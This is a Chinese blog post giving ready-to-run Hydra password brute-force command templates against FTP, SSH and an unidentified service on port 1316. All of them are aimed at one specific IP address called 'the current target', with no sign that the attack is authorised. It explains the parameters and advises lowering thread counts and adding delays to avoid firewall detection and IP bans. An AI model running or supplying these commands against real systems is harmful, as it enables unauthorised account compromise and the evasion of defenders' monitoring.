Hydra 弱口令爆破的详细命令模板

整理一份Hydra 弱口令爆破的详细命令模板,包含 FTP、SSH 等常见服务,还附参数说明和实操注意事项,直接就能用!

一、 Hydra 核心参数说明

先搞懂基础参数,才能灵活调整命令:

  • -l:指定单个用户名 ,比如rootadmin
  • -L:指定用户名字典文件,适合批量枚举
  • -p:指定单个密码
  • -P:指定密码字典文件 ,Kali 默认字典路径:/usr/share/wordlists/
  • -vV:显示详细爆破过程,方便排查问题
  • -o:将爆破结果保存到指定文件,比如-o result.txt
  • -t:设置并发线程数,默认 16,建议 5-20(太高容易被防火墙拦截)
  • service://target:port:指定目标服务、IP 和端口

二、 针对当前目标的实战命令

1. FTP 服务爆破(21 端口)
  • 单个用户名 + 密码字典

    bash

    运行

    复制代码
    hydra -l root -P /usr/share/wordlists/rockyou.txt -vV -t 10 ftp://154.85.57.105:21 -o ftp_brute_result.txt
  • 用户名字典 + 密码字典 (覆盖更多可能性)

    bash

    运行

    复制代码
    hydra -L /usr/share/wordlists/usernames.txt -P /usr/share/wordlists/rockyou.txt -vV -t 8 ftp://154.85.57.105:21

    没有usernames.txt的话,可手动创建,写入rootadminftptest等常见用户名。

2. SSH 服务爆破(22 端口)

SSH 爆破容易触发防火墙封禁,建议降低线程数、增加延迟:

bash

运行

复制代码
hydra -L /usr/share/wordlists/usernames.txt -P /usr/share/wordlists/rockyou.txt -vV -t 5 -w 3 ssh://154.85.57.105:22

参数补充:-w 3 表示每个尝试等待 3 秒,降低被检测风险。

3. 1316 冷门端口尝试(可选)

如果后续确认 1316 端口是某种登录服务,可尝试通用爆破:

bash

运行

复制代码
hydra -l root -P /usr/share/wordlists/rockyou.txt -vV -t 3 154.85.57.105 -s 1316 <服务名>

这里的<服务名>需要根据后续探测结果替换,比如telnethttp-get等。


三、 实操注意事项

  1. 爆破前建议先确认服务是否允许密码登录,比如 SSH 可能只开密钥认证,爆破会白费功夫。
  2. Kali 默认的rockyou.txt字典需要解压,命令:gzip -d /usr/share/wordlists/rockyou.txt.gz
  3. 目标有防火墙,爆破频率别太高,线程数控制在 5-10 之间,避免 IP 被拉黑。
相关推荐
刚入门的大一新生7 小时前
Linux-Linux第一个系统程序-进度条
linux·运维·服务器
wuminyu7 小时前
JDK21解决虚拟线程IO阻塞原理剖析
java·linux·c语言·jvm·c++
LccKyI7 小时前
C#学习day06(方法/函数及其关键字,附思维导图)
经验分享·学习·c#
茫忙然8 小时前
Linux提权辅助查询工具——BinLens的安装和使用
linux·提权·binlens
FlightYe8 小时前
linux系统编程(八):阻塞与非阻塞IO对比
android·linux·运维·服务器·github·vim
.Peter8 小时前
.NET/WPF 程序在部分 Windows 电脑无法保存用户环境变量:使用 DPAPI 实现安全兼容
windows·信息安全·c#·.net·wpf·环境变量·dpapi
xian_wwq8 小时前
【学习笔记】Loop Engineering,从手动提示到目标驱动自动化-13/16
笔记·学习·自动化
殷忆枫8 小时前
K210 BOX学习笔记:环境搭建及模型训练部署
学习
淮北4948 小时前
ubuntu22 默认输入法调整频率
运维·服务器·git·ubuntu·elasticsearch
码字的特恩8 小时前
微软确认暂不为 Windows 11 加入透明效果自定义功能,建议用户使用第三方工具
人工智能·windows·算法·microsoft·计算机·大模型·编程